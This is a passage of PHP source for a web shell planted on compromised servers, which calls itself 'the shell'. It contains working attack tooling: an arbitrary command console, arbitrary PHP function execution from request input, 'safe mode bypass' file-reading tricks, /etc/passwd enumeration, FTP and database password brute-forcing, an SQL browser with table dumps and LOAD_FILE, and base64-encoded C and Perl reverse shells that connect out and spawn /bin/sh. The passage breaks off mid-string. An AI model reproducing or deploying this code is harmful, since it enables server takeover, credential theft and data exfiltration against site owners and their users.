        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        if(function_exists($_POST['p1']))
            echo $_POST['p1']($_POST['p2']);
        $temp = "document.getElementById

('strOutput').style.display='';document.getElementById

('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean

()),"\n\r\t\\'\0")."';\n";
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
    echo '<h1>String conversions</h1><div class=content>';
    $stringTools = array(
        'Base64 encode' => 'base64_encode',
        'Base64 decode' => 'base64_decode',
        'Url encode' => 'urlencode',
        'Url decode' => 'urldecode',
        'Full urlencode' => 'full_urlencode',
        'md5 hash' => 'md5',
        'sha1 hash' => 'sha1',
        'crypt' => 'crypt',
        'CRC32' => 'crc32',
        'ASCII to HEX' => 'ascii2hex',
        'HEX to ASCII' => 'hex2ascii',
        'HEX to DEC' => 'hexdec',
        'HEX to BIN' => 'hex2bin',
        'DEC to HEX' => 'dechex',
        'DEC to BIN' => 'decbin',
        'BIN to HEX' => 'bin2hex',
        'BIN to DEC' => 'bindec',       
        'String to lower case' => 'strtolower',
        'String to upper case' => 'strtoupper',
        'Htmlspecialchars' => 'htmlspecialchars',
        'String length' => 'strlen',
    );
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a

(null,null,this.selectTool.value,this.input.value);}else{g

(null,null,this.selectTool.value,this.input.value);} return

false;'><select name='selectTool'>";
    foreach($stringTools as $k => $v)
        echo "<option value='".htmlspecialchars

($v)."'>".$k."</option>";
        echo "</select><input type='submit' value='>>'/> <input

type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER

['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea

name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars

(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty

($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
    if(!empty($_POST['p1'])) {
        if(function_exists($_POST['p1']))
        echo htmlspecialchars($_POST['p1']($_POST['p2']));
    }
    echo"</pre></div>";
    ?>
    <br><h1>Search for hash:</h1><div class=content>
        <form method='post' target='_blank' name="hf">
            <input type="text" name="hash" style="width:200px;"><br>
            <input type="button" value="hashcrack.com"

onclick="document.hf.action='http://www.hashcrack.com/index.php';docum

ent.hf.submit()"><br>
            <input type="button" value="milw0rm.com"

onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php

';document.hf.submit()"><br>
            <input type="button" value="hashcracking.info"

onclick="document.hf.action='https://hashcracking.info/index.php';docu

ment.hf.submit()"><br>
            <input type="button" value="md5.rednoize.com"

onclick="document.hf.action='http://md5.rednoize.com/?

q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
            <input type="button" value="md5decrypter.com"

onclick="document.hf.action='http://www.md5decrypter.com/';document.hf

.submit()"><br>
        </form>
    </div>
    <?php
    printFooter();
}
 
function actionFilesTools() {
    if( isset($_POST['p1']) )
        $_POST['p1'] = urldecode($_POST['p1']);
    if(@$_POST['p2']=='download') {
        if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment;

filename=".basename($_POST['p1']));
            if (function_exists("mime_content_type")) {
                $type = @mime_content_type($_POST['p1']);
                header("Content-Type: ".$type);
            }
            $fp = @fopen($_POST['p1'], "r");
            if($fp) {
                while(!@feof($fp))
                    echo @fread($fp, 1024);
                fclose($fp);
            }
        } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
 
        }
        exit;
    }
    if( @$_POST['p2'] == 'mkfile' ) {
        if(!file_exists($_POST['p1'])) {
            $fp = @fopen($_POST['p1'], 'w');
            if($fp) {
                $_POST['p2'] = "edit";
                fclose($fp);
            }
        }
    }
    printHeader();
    echo '<h1>File tools</h1><div class=content>';
    if( !file_exists(@$_POST['p1']) ) {
        echo 'File not exists';
        printFooter();
        return;
    }
    $uid = @posix_getpwuid(@fileowner($_POST['p1']));
    $gid = @posix_getgrgid(@fileowner($_POST['p1']));
    echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).'

<span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST

['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST

['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid

['name'].'<br>';
    echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime

($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d

H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y

-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
    if( empty($_POST['p2']) )
        $_POST['p2'] = 'view';
    if( is_file($_POST['p1']) )
        $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit',

'Chmod', 'Rename', 'Touch');
    else
        $m = array('Chmod', 'Rename', 'Touch');
    foreach($m as $v)
        echo '<a href=# onclick="g(null,null,null,\''.strtolower

($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]

</b>':$v).'</a> ';
    echo '<br><br>';
    switch($_POST['p2']) {
        case 'view':
            echo '<pre class=ml1>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</pre>';
            break;
        case 'highlight':
            if( is_readable($_POST['p1']) ) {
                echo '<div class=ml1 style="background-color:

#e1e1e1;color:black;">';
                $code = highlight_file($_POST['p1'],true);
                echo str_replace(array('<span ','</span>'), array

('<font ','</font>'),$code).'</div>';
            }
            break;
        case 'chmod':
            if( !empty($_POST['p3']) ) {
                $perms = 0;
                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                    $perms += (int)$_POST['p3'][$i]*pow(8, (strlen

($_POST['p3'])-$i-1));
                if(!@chmod($_POST['p1'], $perms))
                    echo 'Can\'t set permissions!

<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,null,null,"")</script>');
            }
            echo '<form onsubmit="g

(null,null,null,null,this.chmod.value);return false;"><input type=text

name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-

4).'"><input type=submit value=">>"></form>';
            break;
        case 'edit':
            if( !is_writable($_POST['p1'])) {
                echo 'File isn\'t writeable';
                break;
            }
            if( !empty($_POST['p3']) ) {
                @file_put_contents($_POST['p1'],$_POST['p3']);
                echo 'Saved!

<br><script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g

(null,null,null,null,this.text.value);return false;"><textarea

name=text class=bigarea>';
            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '</textarea><input type=submit value=">>"></form>';
            break;
        case 'hexdump':
            $c = @file_get_contents($_POST['p1']);
            $n = 0;
            $h = array('00000000<br>','','');
            $len = strlen($c);
            for ($i=0; $i<$len; ++$i) {
                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                switch ( ord($c[$i]) ) {
                    case 0:  $h[2] .= ' '; break;
                    case 9:  $h[2] .= ' '; break;
                    case 10: $h[2] .= ' '; break;
                    case 13: $h[2] .= ' '; break;
                    default: $h[2] .= $c[$i]; break;
                }
                $n++;
                if ($n == 32) {
                    $n = 0;
                    if ($i+1 < $len) {$h[0] .= sprintf('%

08X',$i+1).'<br>';}
                    $h[1] .= '<br>';
                    $h[2] .= "\n";
                }
             }
            echo '<table cellspacing=1 cellpadding=5

bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight:

normal;"><pre>'.$h[0].'</pre></span></td><td

bgcolor=#282828><pre>'.$h[1].'</pre></td><td

bgcolor=#333333><pre>'.htmlspecialchars($h

[2]).'</pre></td></tr></table>';
            break;
        case 'rename':
            if( !empty($_POST['p3']) ) {
                if(!@rename($_POST['p1'], $_POST['p3']))
                    echo 'Can\'t rename!

<br><script>document.mf.p3.value="";</script>';
                else
                    die('<script>g(null,null,"'.urlencode($_POST

['p3']).'",null,"")</script>');
            }
            echo '<form onsubmit="g

(null,null,null,null,this.name.value);return false;"><input type=text

name=name value="'.htmlspecialchars($_POST['p1']).'"><input

type=submit value=">>"></form>';
            break;
        case 'touch':
            if( !empty($_POST['p3']) ) {
                $time = strtotime($_POST['p3']);
                if($time) {
                    if(@touch($_POST['p1'],$time,$time))
                        die('<script>g(null,null,null,null,"")

</script>');
                    else {
                        echo 'Fail!

<script>document.mf.p3.value="";</script>';
                    }
                } else echo 'Bad time format!

<script>document.mf.p3.value="";</script>';
            }
            echo '<form onsubmit="g

(null,null,null,null,this.touch.value);return false;"><input type=text

name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST

['p1'])).'"><input type=submit value=">>"></form>';
            break;
        case 'mkfile':
            
            break;
    }
    echo '</div>';
    printFooter();
}
 
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        case 2:
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        case 3:
            $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
            curl_exec($ch);
            break;
        case 4:
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
        case 6:
            if(!function_exists('imap_open'))break;
            $stream = imap_open($_POST['p2'], "", "");
            if ($stream == FALSE)
                break;
            echo imap_body($stream, 1);
            imap_close($stream);
            break;
    }
    $temp = ob_get_clean();
    printHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    echo '<span>Copy (read file)</span><form onsubmit=\'g

(null,null,"1",this.param.value);return false;\'><input type=text

name=param><input type=submit value=">>"></form><br><span>Glob (list

dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return

false;\'><input type=text name=param><input type=submit

value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g

(null,null,"3",this.param.value);return false;\'><input type=text

name=param><input type=submit value=">>"></form><br><span>Ini_restore

(read file)</span><form onsubmit=\'g

(null,null,"4",this.param.value);return false;\'><input type=text

name=param><input type=submit

value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)

</span><table><form onsubmit=\'g

(null,null,"5",this.param1.value,this.param2.value);return

false;\'><tr><td>From</td><td><input type=text name=param1

value=0></td></tr><tr><td>To</td><td><input type=text name=param2

value=1000></td></tr></table><input type=submit

value=">>"></form><br><br><span>Imap_open (read file)</span><form

onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input

type=text name=param><input type=submit value=">>"></form>';
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px"

id="Output">'.$temp.'</pre>';
    echo '</div>';
    printFooter();
}
 
function actionConsole() {
    if(isset($_POST['ajax'])) {
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        echo "document.cf.cmd.value='';\n";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$

".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "document.mf.c.value='".$GLOBALS['cwd']."';";
            }
        }
        echo "document.cf.output.value+='".$temp."';";
        echo "document.cf.output.scrollTop =

document.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), "\n", $temp;
        exit;
    }
    printHeader();
?>
<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array("");
var cur = 0;
function kp(e) {
    var n = (window.Event) ? e.which : e.keyCode;
    if(n == 38) {
        cur--;
        if(cur>=0)
            document.cf.cmd.value = cmds[cur];
        else
            cur++;
    } else if(n == 40) {
        cur++;
        if(cur < cmds.length)
            document.cf.cmd.value = cmds[cur];
        else
            cur--;
    }
}
function add(cmd) {
    cmds.pop();
    cmds.push(cmd);
    cmds.push("");
    cur = cmds.length-1;
}
</script>
<?php
    echo '<h1>Console</h1><div class=content><form name=cf

onsubmit="if(document.cf.cmd.value==\'clear\')

{document.cf.output.value=\'\';document.cf.cmd.value=\'\';return

false;}add(this.cmd.value);if(this.ajax.checked){a

(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return

false;"><select name=alias>';
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars

($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars

($v).'">'.$n.'</option>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo '</select><input type=button onclick="add

(document.cf.alias.value);if(document.cf.ajax.checked){a

(null,null,document.cf.alias.value);}else{g

(null,null,document.cf.alias.value);}" value=">>"> <input

type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER

['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea

class=bigarea name=output style="border-bottom:0;margin:0;"

readonly>';
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST

['p1']));
    }
    echo '</textarea><input type=text name=cmd style="border-

top:0;width:100%;margin:0;" onkeydown="kp(event);">';
    echo '</form></div><script>document.cf.cmd.focus();</script>';
    printFooter();
}
 
function actionLogout() {
    unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
    echo 'bye!';
}
 
function actionSelfRemove() {
    printHeader();
    if($_POST['p1'] == 'yes') {
        if(@unlink(SELF_PATH))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    }
    echo '<h1>Suicide</h1><div class=content>Really want to remove the

shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    printFooter();
}
 
function actionBruteforce() {
    printHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span>

'.htmlspecialchars($_POST['proto']).' <span>Server:</span>

'.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306,

$login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."'

user='".$login."' password='".$pass."' dbname=''";
                $res = @pg_connect($server[0].':'.$server[1]?$server

[1]:5432, $login, $pass);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0],

$line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line

[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line

[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line

[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST

['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST

['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span>

$success</div><br>";
    }
    echo '<h1>FTP bruteforce</h1><div class=content><table><form

method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option

value=mysql>MySql</option><option

value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars

($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST

['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars

($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server

value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked>

/etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input

type=checkbox name=reverse value=1 checked> reverse (login -> nigol)

</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type

value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-

left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="komsen"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars

($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit

value=">>"></td></tr></form></table>';
    echo '</div><br>';
    printFooter();
}
 
function actionSql() {
    class DbClass {
        var $type;
        var $link;
        var $res;
        function DbClass($type)    {
            $this->type = $type;
        }
        function connect($host, $user, $pass, $dbname){
            switch($this->type)    {
                case 'mysql':
                    if( $this->link = @mysql_connect

($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]}

port={$host[1]} user=$user password=$pass dbname=$dbname") ) return

true;
                    break;
            }
            return false;
        }
        function selectdb($db) {
            switch($this->type)    {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type)    {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = @mysql_list_dbs($this->link);
                break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname

FROM pg_database");
                break;
            }
            return false;
        }
        function listTables() {
            switch($this->type)    {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                break;
                case 'pgsql':
                    return $this->res = $this->query("select

table_name from information_schema.tables where (table_schema !=

'information_schema' AND table_schema != 'pg_catalog') or table_name =

'pg_user'");
                break;
            }
            return false;
        }
        function error() {
            switch($this->type)    {
                case 'mysql':
                    return @mysql_error($this->link);
                break;
                case 'pgsql':
                    return @pg_last_error($this->link);
                break;
            }
            return false;
        }
        function setCharset($str) {
            switch($this->type)    {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'mysql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        function dump($table) {
            switch($this->type)    {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE

`'.$table.'`');
                    $create = mysql_fetch_array($res);
                    echo $create[1].";\n\n";
                    $this->query('SELECT * FROM `'.$table.'`');
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".@mysql_real_escape_string

($v)."'";
                            $columns[] = "`".$k."`";
                        }
                    echo 'INSERT INTO `'.$table.'` ('.implode(", ",

$columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                    echo 'INSERT INTO '.$table.' ('.implode(", ",

$columns).') VALUES ('.implode(", ", $item).');'."\n";
                    }
                break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    if(@$_POST['p2']=='download') {
        ob_start("ob_gzhandler", 4096);
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST

['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        header("Content-Disposition: attachment; filename=dump.sql");
        header("Content-Type: text/plain");
        foreach($_POST['tbl'] as $v)
                $db->dump($v);
        exit;
    }
    printHeader();
    ?>
    <h1>Sql browser</h1><div class=content>
    <form name="sf" method="post">
        <table cellpadding="2" cellspacing="0">
            <tr>
                <td>Type</td>
                <td>Host</td>
                <td>Login</td>
                <td>Password</td>
                <td>Database</td>
                <td></td>
            </tr>
            <tr>
                <input type=hidden name=a value=Sql>
                <input type=hidden name=p1 value='query'>
                <input type=hidden name=p2>
                <input type=hidden name=c value='<?=htmlspecialchars

($GLOBALS['cwd']);?>'>
                <input type=hidden name=charset value='<?=isset

($_POST['charset'])?$_POST['charset']:''?>'>
                <td>
                    <select name='type'>
                        <option value="mysql" <?php if(@$_POST

['type']=='mysql')echo 'selected';?>>MySql</option>
                        <option value="pgsql" <?php if(@$_POST

['type']=='pgsql')echo 'selected';?>>PostgreSql</option>
                    </select></td>
                <td><input type=text name=sql_host value='<?=(empty

($_POST['sql_host'])?'localhost':htmlspecialchars($_POST

['sql_host']));?>'></td>
                <td><input type=text name=sql_login value='<?=(empty

($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?

>'></td>
                <td><input type=text name=sql_pass value='<?=(empty

($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?

>'></td>
                <td>
    <?php
    $tmp = "<input type=text name=sql_base value=''>";
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'],

$_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST

['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    ?></td>
                <td><input type=submit value=">>"></td>
            </tr>
        </table>
        <script>
            function st(t,l) {
                document.sf.p1.value = 'select';
                document.sf.p2.value = t;
                if(l!=null)document.sf.p3.value = l;
                document.sf.submit();
            }
            function is() {
                for(i=0;i<document.sf.elements['tbl[]'].length;++i)
                    document.sf.elements['tbl[]'][i].checked = !

document.sf.elements['tbl[]'][i].checked;
            }
        </script>
    <?php
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
            if(!empty($_POST['sql_base'])){
                $db->selectdb($_POST['sql_base']);
                echo "<tr><td width=1 style='border-top:2px solid

#666;border-right:2px solid #666;'><span>Tables:</span><br><br>";
                $tbls_res = $db->listTables();
                while($item = $db->fetch($tbls_res)) {
                    list($key, $value) = each($item);
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n

FROM '.$value.''));
                    $value = htmlspecialchars($value);
                    echo "<nobr><input type='checkbox' name='tbl[]'

value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')

\">".$value."</a> (".$n['n'].")</nobr><br>";
                }
                echo "<input type='checkbox' onclick='is();'> <input

type=button value='Dump'

onclick='document.sf.p2.value=\"download\";document.sf.submit

();'></td><td style='border-top:2px solid #666;'>";
                if(@$_POST['p1'] == 'select') {
                    $_POST['p1'] = 'query';
                    $db->query('SELECT COUNT(*) as n FROM '.$_POST

['p2'].'');
                    $num = $db->fetch();
                    $num = $num['n'];
                    echo "<span>".$_POST['p2']."</span> ($num) ";
                    for($i=0;$i<($num/30);$i++)
                        if($i != (int)$_POST['p3'])
                            echo "<a href='#' onclick='st(\"".$_POST

['p2']."\", $i)'>",($i+1),"</a> ";
                        else
                            echo ($i+1)," ";
                    if($_POST['type']=='pgsql')
                        $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].'

LIMIT 30 OFFSET '.($_POST['p3']*30);
                    else
                        $_POST['p3'] = 'SELECT * FROM `'.$_POST

['p2'].'` LIMIT '.($_POST['p3']*30).',30';
                    echo "<br><br>";
                }
                if((@$_POST['p1'] == 'query') && !empty($_POST['p3']))

{
                    $db->query(@$_POST['p3']);
                    if($db->res !== false) {
                        $title = false;
                        echo '<table width=100% cellspacing=0

cellpadding=2 class=main>';
                        $line = 1;
                        while($item = $db->fetch())    {
                            if(!$title)    {
                                echo '<tr>';
                                foreach($item as $key => $value)
                                    echo '<th>'.$key.'</th>';
                                reset($item);
                                $title=true;
                                echo '</tr><tr>';
                                $line = 2;
                            }
                            echo '<tr class="l'.$line.'">';
                            $line = $line==1?2:1;
                            foreach($item as $key => $value) {
                                if($value == null)
                                    echo '<td><i>null</i></td>';
                                else
                                    echo '<td>'.nl2br

(htmlspecialchars($value)).'</td>';
                            }
                            echo '</tr>';
                        }
                        echo '</table>';
                    } else {
                        echo '<div><b>Error:</b> '.htmlspecialchars

($db->error()).'</div>';
                    }
                }
                echo "<br><textarea name='p3'

style='width:100%;height:100px'>".@htmlspecialchars($_POST

['p3'])."</textarea><br/><input type=submit value='Execute'>";
                echo "</td></tr>";
            }
            echo "</table></form><br/><form

onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.

f.value;document.sf.submit();return false;'><span>Load file</span>

<input  class='toolsInp' type=text name=f><input type=submit

value='>>'></form>";
            if(@$_POST['p1'] == 'loadfile') {
                $db->query("SELECT LOAD_FILE('".addslashes($_POST

['p2'])."') as file");
                $file = $db->fetch();
                echo '<pre class=ml1>'.htmlspecialchars($file

['file']).'</pre>';
            }
    }
    echo '</div>';
    printFooter();
}
function actionNetwork() {
    printHeader();
   

$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tld

C5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGF

yICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpb

jsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQo

gICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpb

l9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldCh

BRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY

3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWR

kcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgI

HJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTs

NCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjb

G9zZShmZCk7DQp9";
   

$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZ

XRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2t

hZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwc

m90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCB

TT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0K

FNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCA

iPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSL

CAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0

KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
   

$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQoj

